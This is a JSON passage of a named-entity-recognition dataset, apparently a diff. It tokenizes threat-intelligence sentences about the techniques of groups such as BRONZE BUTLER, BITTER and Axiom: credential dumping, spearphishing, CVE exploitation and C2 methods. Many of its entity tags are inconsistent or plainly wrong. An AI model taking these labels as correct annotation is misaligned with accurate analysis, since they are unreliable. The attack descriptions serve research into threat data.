"party", + "endpoint", + "detection", + "and", + "response", + "(EDR)", + "tools", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "used", + "native", + "OS", + "commands", + "to", + "understand", + "privilege", + "levels", + "and", + "system", + "details." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "attempted", + "to", + "discover", + "services", + "for", + "third", + "party", + "EDR", + "products." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "acquired", + "and", + "used", + "Cobalt", + "Strike", + "in", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "used", + "publicly", + "accessible", + "DNS", + "logging", + "services", + "to", + "identify", + "servers", + "vulnerable", + "to", + "Log4j", + "(CVE", + "2021-44228)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Aquatic", + "Panda", + "has", + "attempted", + "and", + "failed", + "to", + "run", + "Bash", + "commands", + "on", + "a", + "Windows", + "host", + "by", + "passing", + "them", + "to", + "<code>cmd", + "/C</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "actors", + "have", + "been", + "known", + "to", + "use", + "the", + "Sticky", + "Keys", + "replacement", + "within", + "RDP", + "sessions", + "to", + "obtain", + "persistence." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "compressed", + "and", + "encrypted", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "large", + "groups", + "of", + "compromised", + "machines", + "for", + "use", + "as", + "proxy", + "nodes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "acquired", + "dynamic", + "DNS", + "services", + "for", + "use", + "in", + "the", + "targeting", + "of", + "intended", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "collected", + "data", + "from", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "watering", + "hole", + "attacks", + "to", + "gain", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "been", + "observed", + "using", + "SQL", + "injection", + "to", + "gain", + "access", + "to", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "exploits", + "for", + "multiple", + "vulnerabilities", + "including", + "CVE-2014-0322,", + "CVE-2012-4792,", + "CVE-2012-1889,", + "and", + "CVE-2013-3893." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "been", + "known", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "spear", + "phishing", + "to", + "initially", + "compromise", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "targeted", + "victims", + "with", + "remote", + "administration", + "tools", + "including", + "RDP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "RDP", + "during", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "steganography", + "to", + "hide", + "its", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "digital", + "certificates", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "previously", + "compromised", + "administrative", + "accounts", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Axiom", + "has", + "used", + "VPS", + "hosting", + "providers", + "in", + "targeting", + "of", + "intended", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Idus", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "registered", + "a", + "variety", + "of", + "domains", + "to", + "host", + "malicious", + "payloads", + "and", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "executed", + "OLE", + "objects", + "using", + "Microsoft", + "Equation", + "Editor", + "to", + "download", + "and", + "run", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "used", + "DDNS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "encrypted", + "their", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "used", + "a", + "RAR", + "SFX", + "dropper", + "to", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "exploited", + "Microsoft", + "Office", + "vulnerabilities", + "CVE-2012-0158,", + "CVE-2017-11882,", + "CVE-2018-0798,", + "and", + "CVE-2018-0802." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "exploited", + "CVE-2021-1732", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "downloaded", + "additional", + "malware", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-OffAct", + "I-OffAct", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "attempted", + "to", + "lure", + "victims", + "into", + "opening", + "malicious", + "attachments", + "delivered", + "via", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "disguised", + "malware", + "as", + "a", + "Windows", + "Security", + "update", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "used", + "TCP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "used", + "scheduled", + "tasks", + "for", + "persistence", + "and", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "sent", + "spearphishing", + "emails", + "with", + "a", + "malicious", + "RTF", + "document", + "or", + "Excel", + "spreadsheet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "obtained", + "tools", + "such", + "as", + "PuTTY", + "for", + "use", + "in", + "their", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "registered", + "domains", + "to", + "stage", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BITTER", + "has", + "used", + "HTTP", + "POST", + "requests", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "compressed", + "data", + "into", + "password-protected", + "RAR", + "archives", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "at", + "to", + "register", + "a", + "scheduled", + "task", + "to", + "execute", + "malware", + "during", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "downloader", + "code", + "has", + "included", + "\"0\"", + "characters", + "at", + "the", + "end", + "of", + "the", + "file", + "to", + "inflate", + "the", + "file", + "size", + "in", + "a", + "likely", + "attempt", + "to", + "evade", + "anti-virus", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "a", + "Windows", + "10", + "specific", + "tool", + "and", + "xxmm", + "to", + "bypass", + "UAC", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "legitimate", + "applications", + "to", + "side-load", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "exfiltrated", + "files", + "stolen", + "from", + "local", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "exfiltrated", + "files", + "stolen", + "from", + "file", + "shares." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER's", + "MSGET", + "downloader", + "uses", + "a", + "dead", + "drop", + "resolver", + "to", + "access", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Way", + "B-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "downloads", + "encoded", + "payloads", + "and", + "decodes", + "them", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "incorporated", + "code", + "into", + "several", + "tools", + "that", + "attempts", + "to", + "terminate", + "anti-virus", + "processes." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "<code>net", + "user", + "/domain</code>", + "to", + "identify", + "account", + "information." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "compromised", + "three", + "Japanese", + "websites", + "using", + "a", + "Flash", + "exploit", + "to", + "perform", + "watering", + "hole", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "O", + "O", + "B-Org", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "exploited", + "Microsoft", + "Office", + "vulnerabilities", + "CVE-2014-4114,", + "CVE-2018-0802,", + "and", + "CVE-2018-0798", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "BRONZE", + "BUTLER", + "uploader", + "or", + "malware", + "the", + "uploader", + "uses", + "<code>command</code>", + "to", + "delete", + "the", + "RAR", + "archives", + "after", + "they", + "have", + "been", + "exfiltrated." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "collected", + "a", + "list", + "of", + "files", + "from", + "the", + "victim", + "and", + "uploaded", + "it", + "to", + "its", + "C2", + "server,", + "and", + "then", + "created", + "a", + "new", + "list", + "of", + "specific", + "files", + "to", + "steal." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "various", + "tools", + "to", + "download", + "files,", + "including", + "DGet", + "(a", + "similar", + "tool", + "to", + "wget)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "various", + "tools", + "(such", + "as", + "Mimikatz", + "and", + "WCE)", + "to", + "perform", + "credential", + "dumping." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "attempted", + "to", + "get", + "users", + "to", + "launch", + "malicious", + "Microsoft", + "Word", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "masked", + "executables", + "with", + "document", + "file", + "icons", + "including", + "Word", + "and", + "Adobe", + "PDF." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "given", + "malware", + "the", + "same", + "name", + "as", + "an", + "existing", + "file", + "on", + "the", + "file", + "share", + "server", + "to", + "cause", + "users", + "to", + "unwittingly", + "launch", + "and", + "install", + "the", + "malware", + "on", + "additional", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "created", + "forged", + "Kerberos", + "Ticket", + "Granting", + "Ticket", + "(TGT)", + "and", + "Ticket", + "Granting", + "Service", + "(TGS)", + "tickets", + "to", + "maintain", + "administrative", + "access." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "made", + "use", + "of", + "Python-based", + "remote", + "access", + "tools." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "a", + "batch", + "script", + "that", + "adds", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "malware", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "typically", + "use", + "<code>ping</code>", + "and", + "Net", + "to", + "enumerate", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "Right-to-Left", + "Override", + "to", + "deceive", + "victims", + "into", + "executing", + "several", + "strains", + "of", + "malware." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Exp", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "schtasks", + "to", + "register", + "a", + "scheduled", + "task", + "to", + "execute", + "malware", + "during", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "a", + "tool", + "to", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "tools", + "to", + "enumerate", + "software", + "installed", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "used", + "spearphishing", + "emails", + "with", + "malicious", + "Microsoft", + "Word", + "attachments", + "to", + "infect", + "victims." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-SamFile", + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "BRONZE", + "BUTLER", + "tools", + "encode", + "data", + "with", + "base64", + "when", + "posting", + "it", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "steganography", + "in", + "multiple", + "operations", + "to", + "conceal", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "RC4", + "encryption", + "(for", + "Datper", + "malware)", + "and", + "AES", + "(for", + "xxmm", + "malware)", + "to", + "obfuscate", + "HTTP", + "traffic.", + "BRONZE", + "BUTLER", + "has", + "also", + "used", + "a", + "tool", + "called", + "RarStar", + "that", + "encodes", + "data", + "with", + "a", + "custom", + "XOR", + "algorithm", + "when", + "posting", + "it", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "TROJ_GETVERSION", + "to", + "discover", + "system", + "services." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "<code>net", + "time</code>", + "to", + "check", + "the", + "local", + "time", + "on", + "a", + "target", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "placed", + "malware", + "on", + "file", + "shares", + "and", + "given", + "it", + "the", + "same", + "name", + "as", + "legitimate", + "documents", + "on", + "the", + "share." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "obtained", + "and", + "used", + "open-source", + "tools", + "such", + "as", + "Mimikatz,", + "gsecdump,", + "and", + "Windows", + "Credential", + "Editor." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "VBS", + "and", + "VBE", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "malware", + "has", + "used", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "BRONZE", + "BUTLER", + "has", + "used", + "batch", + "scripts", + "and", + "the", + "command-line", + "interface", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "executed", + "DLL", + "search", + "order", + "hijacking." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "dropped", + "legitimate", + "software", + "onto", + "a", + "compromised", + "host", + "and", + "used", + "it", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "exploited", + "CVE-2020-5902,", + "an", + "F5", + "BIP-IP", + "vulnerability,", + "to", + "drop", + "a", + "Linux", + "backdoor.", + "BackdoorDiplomacy", + "has", + "also", + "exploited", + "mis-configured", + "Plesk", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "downloaded", + "additional", + "files", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "copied", + "files", + "of", + "interest", + "to", + "the", + "main", + "drive's", + "recycle", + "bin." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "obtained", + "and", + "used", + "leaked", + "malware,", + "including", + "DoublePulsar,", + "EternalBlue,", + "EternalRocks,", + "and", + "EternalSynergy,", + "in", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "disguised", + "their", + "backdoor", + "droppers", + "with", + "naming", + "conventions", + "designed", + "to", + "blend", + "into", + "normal", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "dropped", + "implants", + "in", + "folders", + "named", + "for", + "legitimate", + "software." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "used", + "SMBTouch,", + "a", + "vulnerability", + "scanner,", + "to", + "determine", + "whether", + "a", + "target", + "is", + "vulnerable", + "to", + "EternalBlue", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "used", + "EarthWorm", + "for", + "network", + "tunneling", + "with", + "a", + "SOCKS5", + "server", + "and", + "port", + "transfer", + "functionalities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "obfuscated", + "tools", + "and", + "malware", + "it", + "uses", + "with", + "VMProtect." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + "used", + "an", + "executable", + "to", + "detect", + "removable", + "media,", + "such", + "as", + "USB", + "flash", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "BackdoorDiplomacy", + "has", + 